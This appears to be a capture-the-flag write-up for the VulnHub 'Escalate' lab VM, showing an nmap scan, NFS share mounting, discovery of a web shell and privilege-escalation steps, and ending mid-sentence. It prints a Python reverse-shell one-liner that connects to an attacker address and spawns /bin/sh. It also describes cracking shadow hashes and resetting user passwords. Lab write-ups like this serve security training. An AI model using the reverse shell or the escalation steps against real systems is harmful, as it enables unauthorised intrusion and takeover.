CTF-Writeups/VulnHub/Escalate.md
2020-12-23 02:17:01 +05:00

7.7 KiB

VulnHub-Escalate

Netdiscover

NMAP

map scan report for 192.168.1.9                                          
Host is up (0.00018s latency).                                            
Not shown: 995 closed ports                                               
PORT     STATE SERVICE     VERSION                                                                                                                  
80/tcp   open  http        Apache httpd 2.4.29 ((Ubuntu))                                                                                           
|_http-server-header: Apache/2.4.29 (Ubuntu)                                                                                                        
|_http-title: Apache2 Ubuntu Default Page: It works                                                                                                 
111/tcp  open  rpcbind     2-4 (RPC #100000)                                                                                                        
| rpcinfo:                           
|   program version    port/proto  service                                
|   100000  2,3,4        111/tcp   rpcbind                                
|   100000  2,3,4        111/udp   rpcbind                                
|   100000  3,4          111/tcp6  rpcbind                                
|   100000  3,4          111/udp6  rpcbind                                
|   100003  3           2049/udp   nfs                                    
|   100003  3           2049/udp6  nfs                                    
|   100003  3,4         2049/tcp   nfs                                    
|   100003  3,4         2049/tcp6  nfs                                    
|   100005  1,2,3      36783/tcp   mountd                                 
|   100005  1,2,3      45957/tcp6  mountd                                 
|   100005  1,2,3      49353/udp6  mountd                                 
|   100005  1,2,3      53224/udp   mountd                                 
|   100021  1,3,4      34827/tcp   nlockmgr                               
|   100021  1,3,4      35196/udp6  nlockmgr                               
|   100021  1,3,4      40071/tcp6  nlockmgr                               
|   100021  1,3,4      52969/udp   nlockmgr                               
|   100227  3           2049/tcp   nfs_acl                                
|   100227  3           2049/tcp6  nfs_acl                    
|   100021  1,3,4      52969/udp   nlockmgr                               
|   100227  3           2049/tcp   nfs_acl                                
|   100227  3           2049/tcp6  nfs_acl                                
|   100227  3           2049/udp   nfs_acl                                
|_  100227  3           2049/udp6  nfs_acl                                
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)                                                                              
445/tcp  open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)                                                                           
2049/tcp open  nfs_acl     3 (RPC #100227)                                
MAC Address: 08:00:27:41:41:C0 (Oracle VirtualBox virtual NIC)                                                                                      
Service Info: Host: LINUX            
|
Host script results:                 
|_clock-skew: mean: 1h39m59s, deviation: 2h53m12s, median: 0s                                                                                       
|_nbstat: NetBIOS name: LINUX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)                                                            
| smb-os-discovery:                  
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)                                  
|   Computer name: osboxes           
|   NetBIOS computer name: LINUX\x00                                      
|   Domain name: \x00                
|   FQDN: osboxes                    
|_  System time: 2020-12-22T14:28:16-05:00                                
| smb-security-mode:                 
|   account_used: guest              
|   authentication_level: user                                            
|   challenge_response: supported               
|_  System time: 2020-12-22T14:28:16-05:00                                
| smb-security-mode:                 
|   account_used: guest              
|   authentication_level: user                                            
|   challenge_response: supported                                         
|_  message_signing: disabled (dangerous, but default)                    
| smb2-security-mode:                
|   2.02:                            
|_    Message signing enabled but not required                            
| smb2-time:                         
|   date: 2020-12-22T19:28:16                                             
|_  start_date: N/A                  

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .                                                      
Nmap done: 1 IP address (1 host up) scanned in 13.41 seconds  

So from the nmap scan we have port 80 (http) and port 445 (smb) which are open through which we can enumerate

PORT 445 (SMB)

But as an anonymous we cannot access the share on the box .

PORT 80 (HTTP)

Didn't found any directory through gobuster so let's move on to enumerate port 2049.

PORT 2049 (NFS)

We found that there's a NFS share the we can mount on our local machine

Now we have mounted that nfs to our local machine's directory /mnt/home , before mounting it remeber to create a folder in /mnt directory it doesn't really have to be the exact name of the nfs share.

On mounting we saw what user5's home directory contains

ls script will run three commands prinitng user id ,user name and reading the contents of /etc/shadow also there was script which has SUID bit on and it just list the directoires in current path.

Then I tried to fuzz again and this time looked for files with php extensions and found shell.php

We have found RCE now we just want a reverse shell from it,

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.6",3333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

We got a reverse shell as user6.

As we saw from the nfs share user5's directory by running ls it will try to read /etc/shadow but here it cannot as it does not have permissions to read it.

Privilege Escalation

Method 1

By going to user3's home directory run shell and you'll get root

Method 2

Once I got root , grabbed all hashes and tried to crack them but only root's hash was cracked which is what we want so now we can change all user's passwords and see what groups they belong to

I changed all passwords for the users on the box

User8 can run vi as root so,